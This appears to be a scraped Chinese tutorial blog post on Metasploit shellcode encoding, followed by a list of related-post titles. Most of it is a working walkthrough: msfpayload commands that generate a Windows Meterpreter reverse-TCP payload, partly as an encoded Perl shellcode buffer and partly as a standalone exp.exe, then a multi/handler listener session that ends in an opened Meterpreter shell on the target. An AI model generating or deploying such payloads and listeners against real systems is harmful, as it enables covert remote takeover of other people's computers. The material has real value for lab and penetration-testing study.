root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b '\x00' -t perl -e x86/alpha_mixed[*] x86/alpha_mixed succeeded with size 642 (iteration=1)my $buf = "\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" ."\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" ."\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" ."\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" ."\x42\x75\x4a\x49\x49\x6c\x4b\x58\x4e\x69\x45\x50\x43\x30" ."\x47\x70\x43\x50\x4c\x49\x5a\x45\x50\x31\x4e\x32\x50\x64" ."\x4e\x6b\x51\x42\x50\x30\x4e\x6b\x50\x52\x56\x6c\x4c\x4b" .··········
还可以使用
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.254.133 LPORT=4444 X > /root/Desktop/exp.exe
用的IP和端口 是 监听电脑的端口。在被攻击电脑上运行shellcode 然后监听电脑得到meterpreter
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > set LHOST 192.168.198.135//对方的IPLHOST => 192.168.198.135msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.198.135 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > exploit [*] Started reverse handler on 192.168.198.135:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 192.168.198.136[*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800meterpreter >
0 0
- matasploit+shellcode编码学习
- Shellcode 编码、解码
- metasploit shellcode编码命令....
- 学习ShellCode(一)
- Shellcode学习代码
- shellcode学习总结
- 学习写一个shellcode
- [0day安全-学习总结]第三章开发shellcode的艺术之shellocde编码解码原理
- Matasploit扫描漏洞方法
- shellcode的一种ascii编码方法
- shellcode的一种ascii编码方法
- [shellcode学习] 绕过条件判断
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- shellcode
- spring框架学习(六)AOP
- 数码管 定时器 去抖动
- window
- Quartz.net2.2初体验
- url地址前设置icon
- matasploit+shellcode编码学习
- 【python】如何在电脑上调试android上的python代码
- 弹出对话框
- What is IP Routing?
- Processes and Threads life cycle生命周期
- Numpy学习笔记1--genfromtxt
- 黑马程序员--Java基础--13反射
- hpp/cpp
- python的time模块使用
